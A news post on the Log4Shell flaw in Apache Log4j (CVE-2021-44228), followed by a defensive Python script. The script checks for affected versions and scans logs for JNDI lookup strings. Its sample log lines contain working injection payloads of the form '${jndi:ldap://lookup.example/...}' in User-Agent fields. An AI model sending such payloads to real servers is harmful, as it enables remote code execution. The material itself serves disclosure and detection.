A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers.

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Many open source projects, like the Minecraft server Paper, have already begun patching their usage of log4j. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. Anybody using Apache Struts is likely vulnerable. Cloud services like Steam and Apple iCloud, and apps like Minecraft, have already been found to be vulnerable. Many, many services are vulnerable to this exploit.

This has been published as CVE-2021-44228 now. The 0-day was tweeted along with a POC posted on GitHub. We're calling it "Log4Shell" for short (CVE-2021-44228 just isn't as memorable).

Slashdot reader alfabravoteam shares an excerpt from a blog post by researchers at LunaSec, warning that "anybody using Apache Struts is likely vulnerable." From the report: Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. It's also used in enterprise applications and it's likely that many products will be found to be vulnerable as more is learned about the flaw. The vulnerability was first discovered in Minecraft, but researchers warn that cloud applications are also vulnerable. Systems and services that use the Java logging library Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. CISA has urged users and administrators to apply the recommended mitigations "immediately" in order to address the critical vulnerabilities. CERT New Zealand warns that it's already being exploited in the wild.

ZDNet reports: Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library.
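Two checks a defender can run against the facts above, written as an added example for this post (not code from LunaSec, ZDNet or the Log4j project): one tests whether a Log4j 2 version string falls in the affected 2.0 to 2.14.1 range, the other scans log lines for the `${jndi:...}` lookup string that triggers message lookup substitution. The sample log lines and the host `lookup.example` are constructed for the example; dropping pre-release suffixes from version strings is an assumption, not something the post states.

```python
import re
from typing import List, Optional, Tuple

# Affected range as stated in the post: Log4j 2.0 through 2.14.1 inclusive.
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)

# A JNDI lookup string inside a logged value, e.g. "${jndi:ldap://host/x}".
# Case-insensitive, since Log4j resolves the lookup regardless of case;
# group 1 captures the URI scheme (ldap in the case the post describes).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:([a-z]+):", re.IGNORECASE)


def parse_version(version: str) -> Optional[Tuple[int, ...]]:
    """'2.14.1' or '2.14' -> comparable tuple padded to 3 parts; None if unparsable.
    Pre-release suffixes such as '-rc1' are dropped (an assumption of this example)."""
    parts = version.strip().split("-")[0].split(".")
    if not all(p.isdigit() for p in parts):
        return None
    nums = [int(p) for p in parts[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_affected_version(version: str) -> bool:
    """True if the Log4j 2 version lies in the range the post names as affected."""
    v = parse_version(version)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str]]:
    """(line_number, scheme) for every log line that carries a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append((lineno, match.group(1).lower()))
    return hits


# Constructed sample access-log lines (not real traffic); the second and third
# carry a lookup string in the User-Agent field, a value that commonly gets logged.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup.example/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 302 "${JNDI:LDAP://lookup.example/b}"',
]

if __name__ == "__main__":
    for ver in ("2.14.1", "2.15.0", "1.2.17"):
        print(ver, "affected" if is_affected_version(ver) else "not in affected range")
    for lineno, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme}")
```

A hit from `find_jndi_lookups` is an indicator that someone sent a lookup string, not proof the lookup was resolved; confirming exposure still needs the version check and a review of whether message lookup substitution is enabled on that host.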